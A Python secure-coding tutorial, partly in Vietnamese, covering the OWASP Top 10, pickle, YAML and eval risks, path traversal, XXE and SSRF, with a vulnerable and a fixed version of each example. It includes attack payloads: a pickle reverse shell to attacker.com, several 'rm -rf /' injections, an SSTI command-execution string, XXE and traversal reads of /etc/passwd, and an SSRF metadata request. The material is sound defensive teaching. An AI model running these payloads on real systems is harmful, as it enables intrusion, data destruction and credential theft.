Giao diện
Common Vulnerabilities Security
Hiểu các lỗ hổng phổ biến để không bao giờ mắc phải chúng
Learning Outcomes
Sau khi hoàn thành trang này, bạn sẽ:
- 🎯 Hiểu OWASP Top 10 và cách áp dụng cho Python
- 🎯 Nhận biết nguy hiểm của pickle và deserialization
- 🎯 Tránh eval() và code injection risks
- 🎯 Phòng chống Path Traversal attacks
- 🎯 Identify và fix các Production Pitfalls bảo mật
OWASP Top 10 cho Python
OWASP Top 10 là danh sách 10 lỗ hổng bảo mật web phổ biến nhất. Đây là cách chúng áp dụng cho Python.
┌─────────────────────────────────────────────────────────────┐
│ A01: Broken Access Control │
│ A02: Cryptographic Failures │
│ A03: Injection │
│ A04: Insecure Design │
│ A05: Security Misconfiguration │
│ A06: Vulnerable Components │
│ A07: Identification & Authentication Failures │
│ A08: Software & Data Integrity Failures │
│ A09: Security Logging & Monitoring Failures │
│ A10: Server-Side Request Forgery (SSRF) │
└─────────────────────────────────────────────────────────────┘A01: Broken Access Control
python
from fastapi import FastAPI, Depends, HTTPException
from typing import Optional
app = FastAPI()
# ❌ VULNERABLE: No authorization check
@app.get("/users/{user_id}/profile")
async def get_profile_bad(user_id: int):
return get_user_profile(user_id) # Anyone can access any profile!
# ❌ VULNERABLE: Insecure Direct Object Reference (IDOR)
@app.delete("/documents/{doc_id}")
async def delete_document_bad(doc_id: int):
delete_document(doc_id) # No ownership check!
return {"deleted": doc_id}python
# ✅ SECURE: Proper authorization
from fastapi import Depends
from models import User, Document
async def get_current_user(token: str = Depends(oauth2_scheme)) -> User:
"""Verify token and return current user."""
user = verify_token(token)
if not user:
raise HTTPException(status_code=401, detail="Invalid token")
return user
@app.get("/users/{user_id}/profile")
async def get_profile_good(
user_id: int,
current_user: User = Depends(get_current_user)
):
# Check if user can access this profile
if current_user.id != user_id and not current_user.is_admin:
raise HTTPException(status_code=403, detail="Access denied")
return get_user_profile(user_id)
@app.delete("/documents/{doc_id}")
async def delete_document_good(
doc_id: int,
current_user: User = Depends(get_current_user)
):
document = get_document(doc_id)
if not document:
raise HTTPException(status_code=404, detail="Document not found")
# Verify ownership
if document.owner_id != current_user.id and not current_user.is_admin:
raise HTTPException(status_code=403, detail="Not your document")
delete_document(doc_id)
return {"deleted": doc_id}A03: Injection
python
# SQL Injection - covered in validation.md
# Command Injection - covered in validation.md
# Template Injection
from jinja2 import Environment, BaseLoader, select_autoescape
# ❌ VULNERABLE: User input in template
def render_bad(user_input: str) -> str:
template = Environment(loader=BaseLoader()).from_string(user_input)
return template.render()
# Attack: {{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
# ✅ SECURE: Autoescape and sandboxed environment
from jinja2.sandbox import SandboxedEnvironment
def render_good(template_str: str, context: dict) -> str:
env = SandboxedEnvironment(
loader=BaseLoader(),
autoescape=select_autoescape(['html', 'xml'])
)
template = env.from_string(template_str)
return template.render(**context)A05: Security Misconfiguration
python
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
app = FastAPI()
# ❌ VULNERABLE: Overly permissive CORS
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # Allows ANY origin!
allow_credentials=True, # With credentials = very dangerous
allow_methods=["*"],
allow_headers=["*"],
)
# ✅ SECURE: Specific origins
ALLOWED_ORIGINS = [
"https://myapp.com",
"https://admin.myapp.com",
]
if os.environ.get("DEBUG"):
ALLOWED_ORIGINS.append("http://localhost:3000")
app.add_middleware(
CORSMiddleware,
allow_origins=ALLOWED_ORIGINS,
allow_credentials=True,
allow_methods=["GET", "POST", "PUT", "DELETE"],
allow_headers=["Authorization", "Content-Type"],
)
)python
# ❌ VULNERABLE: Debug mode in production
from flask import Flask
app = Flask(__name__)
app.run(debug=True) # Exposes debugger, allows code execution!
# ✅ SECURE: Environment-based configuration
import os
DEBUG = os.environ.get("FLASK_DEBUG", "false").lower() == "true"
app.run(debug=DEBUG) # Only True in developmentA06: Vulnerable Components
python
# Check for known vulnerabilities in dependencies
# Using pip-audit
# $ pip-audit
# Found 2 known vulnerabilities in 1 package
# Using safety
# $ safety check
# +==============================================================================+
# | REPORT |
# +==============================================================================+
# | package: requests |
# | installed: 2.25.0 |
# | affected: <2.31.0 |
# | id: 58755 |
# +==============================================================================+
# Automated in CI/CD
# .github/workflows/security.yml
"""
name: Security Scan
on: [push, pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.12'
- run: pip install pip-audit
- run: pip-audit --require-hashes --strict
"""A10: Server-Side Request Forgery (SSRF)
python
import requests
from urllib.parse import urlparse
# ❌ VULNERABLE: Fetch any URL user provides
@app.post("/fetch-url")
async def fetch_url_bad(url: str):
response = requests.get(url) # Can access internal services!
return {"content": response.text}
# Attack: url = "http://169.254.169.254/latest/meta-data/"
# Accesses AWS metadata service!
# ✅ SECURE: Validate and restrict URLs
import ipaddress
import socket
ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}
BLOCKED_NETWORKS = [
ipaddress.ip_network("10.0.0.0/8"), # Private
ipaddress.ip_network("172.16.0.0/12"), # Private
ipaddress.ip_network("192.168.0.0/16"), # Private
ipaddress.ip_network("169.254.0.0/16"), # Link-local (AWS metadata)
]
def is_safe_url(url: str) -> bool:
"""Check if URL is safe to fetch."""
try:
parsed = urlparse(url)
# Check scheme
if parsed.scheme not in ALLOWED_SCHEMES:
return False
# Check hostname
hostname = parsed.hostname
if not hostname or hostname in BLOCKED_HOSTS:
return False
# Resolve hostname and check IP
try:
ip = ipaddress.ip_address(socket.gethostbyname(hostname))
for network in BLOCKED_NETWORKS:
if ip in network:
return False
except (socket.gaierror, ValueError):
return False
return True
except Exception:
return False
@app.post("/fetch-url")
async def fetch_url_good(url: str):
if not is_safe_url(url):
raise HTTPException(status_code=400, detail="URL not allowed")
response = requests.get(url, timeout=10)
return {"content": response.text[:10000]} # Limit response sizePickle Dangers
pickle là một trong những lỗ hổng nguy hiểm nhất trong Python. KHÔNG BAO GIỜ unpickle data từ nguồn không tin cậy.
The Problem
python
import pickle
# Pickle có thể execute arbitrary code khi unpickle
class Exploit:
def __reduce__(self):
import os
return (os.system, ("rm -rf /",)) # Executes on unpickle!
# ❌ VULNERABLE: Unpickle user data
@app.post("/load-data")
async def load_data_bad(data: bytes):
obj = pickle.loads(data) # ARBITRARY CODE EXECUTION!
return {"loaded": str(obj)}
# Attack: Attacker sends pickled Exploit object
# Server executes: os.system("rm -rf /")Real Attack Example
python
import pickle
import base64
# Attacker creates malicious pickle
class ReverseShell:
def __reduce__(self):
import subprocess
return (
subprocess.Popen,
(["bash", "-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],)
)
# Serialize and encode
payload = base64.b64encode(pickle.dumps(ReverseShell()))
print(payload) # Send this to vulnerable endpoint
# When server unpickles: reverse shell to attacker!Safe Alternatives
python
import json
from typing import Any
# ✅ SAFE: Use JSON for untrusted data
@app.post("/load-data")
async def load_data_good(data: str):
try:
obj = json.loads(data) # Only parses data, no code execution
return {"loaded": obj}
except json.JSONDecodeError:
raise HTTPException(status_code=400, detail="Invalid JSON")
# ✅ SAFE: Use Pydantic for structured data
from pydantic import BaseModel
class UserData(BaseModel):
name: str
age: int
tags: list[str]
@app.post("/load-user")
async def load_user(data: UserData):
return {"user": data.model_dump()}If You Must Use Pickle
python
import pickle
import hmac
import hashlib
SECRET_KEY = b"your-secret-key-here"
def secure_pickle_dumps(obj: Any) -> bytes:
"""Pickle with HMAC signature."""
data = pickle.dumps(obj)
signature = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
return signature + data
def secure_pickle_loads(signed_data: bytes) -> Any:
"""Unpickle with signature verification."""
if len(signed_data) < 32:
raise ValueError("Invalid data")
signature = signed_data[:32]
data = signed_data[32:]
expected_sig = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
if not hmac.compare_digest(signature, expected_sig):
raise ValueError("Invalid signature - data may be tampered")
return pickle.loads(data)
# ⚠️ WARNING: This only prevents tampering, not malicious internal data!
# Only use for data YOU created, never for user inputPickle Alternatives Comparison
| Format | Safe for Untrusted? | Preserves Types? | Human Readable? |
|---|---|---|---|
| pickle | ❌ NO | ✅ Yes | ❌ No |
| JSON | ✅ Yes | ❌ Basic only | ✅ Yes |
| MessagePack | ✅ Yes | ❌ Basic only | ❌ No |
| Protocol Buffers | ✅ Yes | ✅ Schema-defined | ❌ No |
| YAML | ⚠️ Careful | ❌ Basic only | ✅ Yes |
eval() and exec() Risks
eval() và exec() execute arbitrary Python code. KHÔNG BAO GIỜ dùng với user input.
The Problem
python
# ❌ VULNERABLE: eval() with user input
@app.get("/calculate")
async def calculate_bad(expression: str):
result = eval(expression) # ARBITRARY CODE EXECUTION!
return {"result": result}
# Attack: expression = "__import__('os').system('rm -rf /')"
# Server executes: os.system('rm -rf /')
# ❌ VULNERABLE: exec() with user input
@app.post("/run-code")
async def run_code_bad(code: str):
exec(code) # ARBITRARY CODE EXECUTION!
return {"status": "executed"}Safe Alternatives
python
# ✅ SAFE: Use ast.literal_eval for simple expressions
import ast
def safe_eval(expression: str) -> Any:
"""Safely evaluate literal expressions only."""
try:
return ast.literal_eval(expression)
except (ValueError, SyntaxError):
raise ValueError("Invalid expression")
# Only allows: strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None
safe_eval("[1, 2, 3]") # OK: [1, 2, 3]
safe_eval("{'a': 1}") # OK: {'a': 1}
# safe_eval("__import__('os')") # ValueError!
# ✅ SAFE: Use a math expression parser
# pip install simpleeval
from simpleeval import simple_eval
@app.get("/calculate")
async def calculate_good(expression: str):
try:
# Only allows math operations
result = simple_eval(expression)
return {"result": result}
except Exception:
raise HTTPException(status_code=400, detail="Invalid expression")
# simple_eval("2 + 2") # OK: 4
# simple_eval("10 * (5 + 3)") # OK: 80
# simple_eval("__import__('os')") # NameNotDefined errorIf You Must Execute Dynamic Code
python
# ✅ SAFER: Restricted execution environment
import ast
from typing import Any
ALLOWED_NAMES = {
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'len': len,
'round': round,
'True': True,
'False': False,
'None': None,
}
ALLOWED_NODES = {
ast.Expression,
ast.BinOp,
ast.UnaryOp,
ast.Compare,
ast.Num, # Python < 3.8
ast.Constant, # Python >= 3.8
ast.Name,
ast.Load,
ast.Add, ast.Sub, ast.Mult, ast.Div,
ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
}
def restricted_eval(expression: str, variables: dict = None) -> Any:
"""
Evaluate expression with restricted operations.
Args:
expression: Math/logic expression
variables: Additional allowed variables
Returns:
Evaluation result
"""
# Parse to AST
try:
tree = ast.parse(expression, mode='eval')
except SyntaxError:
raise ValueError("Invalid syntax")
# Validate all nodes are allowed
for node in ast.walk(tree):
if type(node) not in ALLOWED_NODES:
raise ValueError(f"Operation not allowed: {type(node).__name__}")
# Build namespace
namespace = ALLOWED_NAMES.copy()
if variables:
namespace.update(variables)
# Evaluate
code = compile(tree, '<string>', 'eval')
return eval(code, {"__builtins__": {}}, namespace)
# Usage
result = restricted_eval("x + y * 2", {"x": 10, "y": 5}) # 20
# restricted_eval("__import__('os')") # ValueError!Path Traversal
Path traversal cho phép attacker truy cập files ngoài thư mục cho phép.
The Problem
python
from pathlib import Path
# ❌ VULNERABLE: Direct path concatenation
@app.get("/files/{filename}")
async def get_file_bad(filename: str):
filepath = f"/var/www/uploads/{filename}"
return FileResponse(filepath)
# Attack: filename = "../../../etc/passwd"
# Accesses: /var/www/uploads/../../../etc/passwd = /etc/passwd
# ❌ VULNERABLE: Even with Path
@app.get("/files/{filename}")
async def get_file_still_bad(filename: str):
base = Path("/var/www/uploads")
filepath = base / filename # Still vulnerable!
return FileResponse(filepath)Safe File Access
python
from pathlib import Path
from fastapi import HTTPException
from fastapi.responses import FileResponse
BASE_DIR = Path("/var/www/uploads").resolve()
def safe_path(base: Path, user_path: str) -> Path:
"""
Safely resolve user-provided path within base directory.
Args:
base: Base directory (must be absolute)
user_path: User-provided path component
Returns:
Safe resolved path
Raises:
ValueError: If path escapes base directory
"""
# Resolve to absolute path
try:
full_path = (base / user_path).resolve()
except (OSError, ValueError):
raise ValueError("Invalid path")
# Ensure path is within base directory
try:
full_path.relative_to(base)
except ValueError:
raise ValueError("Path traversal detected")
return full_path
@app.get("/files/{filename:path}")
async def get_file_good(filename: str):
try:
filepath = safe_path(BASE_DIR, filename)
except ValueError as e:
raise HTTPException(status_code=400, detail=str(e))
if not filepath.exists():
raise HTTPException(status_code=404, detail="File not found")
if not filepath.is_file():
raise HTTPException(status_code=400, detail="Not a file")
return FileResponse(filepath)Additional Path Security
python
from pathlib import Path
import os
import stat
def secure_file_access(
base_dir: Path,
user_path: str,
allowed_extensions: set[str] = None,
max_size: int = None
) -> Path:
"""
Comprehensive secure file access.
Args:
base_dir: Base directory
user_path: User-provided path
allowed_extensions: Set of allowed extensions (e.g., {'.txt', '.pdf'})
max_size: Maximum file size in bytes
Returns:
Safe file path
Raises:
ValueError: If any security check fails
"""
# 1. Resolve path safely
base = base_dir.resolve()
try:
filepath = (base / user_path).resolve()
except (OSError, ValueError):
raise ValueError("Invalid path")
# 2. Check path is within base
try:
filepath.relative_to(base)
except ValueError:
raise ValueError("Path traversal detected")
# 3. Check file exists and is regular file
if not filepath.exists():
raise ValueError("File not found")
if not filepath.is_file():
raise ValueError("Not a regular file")
# 4. Check not a symlink (could point outside base)
if filepath.is_symlink():
# Resolve symlink and check again
real_path = filepath.resolve()
try:
real_path.relative_to(base)
except ValueError:
raise ValueError("Symlink points outside allowed directory")
# 5. Check extension
if allowed_extensions:
if filepath.suffix.lower() not in allowed_extensions:
raise ValueError(f"Extension not allowed: {filepath.suffix}")
# 6. Check file size
if max_size:
file_size = filepath.stat().st_size
if file_size > max_size:
raise ValueError(f"File too large: {file_size} bytes")
# 7. Check file permissions (optional - ensure readable)
if not os.access(filepath, os.R_OK):
raise ValueError("File not readable")
return filepath
# Usage
filepath = secure_file_access(
base_dir=Path("/var/www/uploads"),
user_path="documents/report.pdf",
allowed_extensions={".pdf", ".txt", ".docx"},
max_size=10 * 1024 * 1024 # 10MB
)Other Common Vulnerabilities
XML External Entity (XXE)
python
import xml.etree.ElementTree as ET
# ❌ VULNERABLE: Default XML parser allows external entities
def parse_xml_bad(xml_string: str):
return ET.fromstring(xml_string)
# Attack payload:
"""
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""
# ✅ SAFE: Use defusedxml
from defusedxml import ElementTree as SafeET
def parse_xml_good(xml_string: str):
return SafeET.fromstring(xml_string)
# Raises EntitiesForbidden if external entities detectedYAML Deserialization
python
import yaml
# ❌ VULNERABLE: yaml.load() can execute code
def load_yaml_bad(yaml_string: str):
return yaml.load(yaml_string) # Unsafe!
# Attack payload:
"""
!!python/object/apply:os.system
args: ['rm -rf /']
"""
# ✅ SAFE: Use safe_load
def load_yaml_good(yaml_string: str):
return yaml.safe_load(yaml_string)
# Only loads basic Python typesRegular Expression Denial of Service (ReDoS)
python
import re
# ❌ VULNERABLE: Catastrophic backtracking
evil_patterns = [
r'^(a+)+$', # Nested quantifiers
r'^([a-zA-Z]+)*$', # Nested quantifiers
r'^(a|a)+$', # Overlapping alternatives
]
# Attack: 'a' * 30 + 'b' causes exponential time
# ✅ SAFE: Use atomic groups or possessive quantifiers
# Or use google-re2 library
import re2 # pip install google-re2
def safe_regex_match(pattern: str, text: str) -> bool:
"""Match regex with guaranteed linear time."""
try:
return bool(re2.match(pattern, text))
except re2.error:
return FalseInsecure Randomness
python
import random
# ❌ VULNERABLE: random module is predictable
def generate_token_bad():
return ''.join(random.choices('abcdef0123456789', k=32))
# Attacker can predict future tokens if they know seed
# ✅ SAFE: Use secrets module
import secrets
def generate_token_good():
return secrets.token_hex(16) # Cryptographically secureProduction Pitfalls
Pitfall 1: Trusting Client-Side Validation
python
# ❌ BUG: Only validating on frontend
# Frontend: if (age < 0) showError("Invalid age")
# Backend assumes frontend validated
@app.post("/users")
async def create_user_bad(data: dict):
user = User(**data) # No validation!
db.add(user)
return user
# ✅ FIX: Always validate on backend
from pydantic import BaseModel, Field
class UserCreate(BaseModel):
name: str = Field(..., min_length=1, max_length=100)
age: int = Field(..., ge=0, le=150)
email: EmailStr
@app.post("/users")
async def create_user_good(data: UserCreate):
user = User(**data.model_dump())
db.add(user)
return userPitfall 2: Information Disclosure in Errors
python
# ❌ BUG: Exposing internal details
@app.get("/users/{user_id}")
async def get_user_bad(user_id: int):
try:
return db.query(User).filter(User.id == user_id).one()
except Exception as e:
raise HTTPException(status_code=500, detail=str(e))
# Exposes: "sqlalchemy.exc.NoResultFound: No row was found..."
# ✅ FIX: Generic error messages
import logging
logger = logging.getLogger(__name__)
@app.get("/users/{user_id}")
async def get_user_good(user_id: int):
try:
user = db.query(User).filter(User.id == user_id).first()
if not user:
raise HTTPException(status_code=404, detail="User not found")
return user
except HTTPException:
raise
except Exception as e:
logger.exception(f"Error fetching user {user_id}") # Log details
raise HTTPException(status_code=500, detail="Internal server error")Pitfall 3: Mass Assignment
python
# ❌ BUG: Accepting all fields
@app.put("/users/{user_id}")
async def update_user_bad(user_id: int, data: dict):
user = get_user(user_id)
for key, value in data.items():
setattr(user, key, value) # Can set is_admin=True!
db.commit()
# ✅ FIX: Explicit allowed fields
class UserUpdate(BaseModel):
name: Optional[str] = None
email: Optional[EmailStr] = None
# is_admin NOT included
@app.put("/users/{user_id}")
async def update_user_good(user_id: int, data: UserUpdate):
user = get_user(user_id)
update_data = data.model_dump(exclude_unset=True)
for key, value in update_data.items():
setattr(user, key, value)
db.commit()Pitfall 4: Timing Attacks
python
# ❌ BUG: Early return reveals information
def verify_password_bad(provided: str, stored_str: str) -> bool:
if len(provided) != len(stored):
return False # Reveals password length!
for a, b in zip(provided, stored):
if a != b:
return False # Early exit reveals position
return True
# ✅ FIX: Constant-time comparison
import hmac
def verify_password_good(provided: str, stored: str) -> bool:
return hmac.compare_digest(provided.encode(), stored.encode())Quick Reference
python
# === NEVER DO ===
pickle.loads(untrusted_data) # Arbitrary code execution
eval(user_input) # Arbitrary code execution
exec(user_input) # Arbitrary code execution
yaml.load(untrusted_yaml) # Use yaml.safe_load()
os.system(f"cmd {user_input}") # Command injection
# === ALWAYS DO ===
# Parameterized queries
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Safe path handling
safe_path = (base_dir / user_path).resolve()
safe_path.relative_to(base_dir) # Raises if outside
# Constant-time comparison
secrets.compare_digest(a, b)
# Safe XML parsing
from defusedxml import ElementTree
ElementTree.fromstring(xml_data)
# Safe YAML parsing
yaml.safe_load(yaml_data)Cross-links
- Prerequisites: Input Validation
- Related: Secrets Management - Credential security
- See Also: Secure Coding Patterns - Best practices
- See Also: API Design - Secure API patterns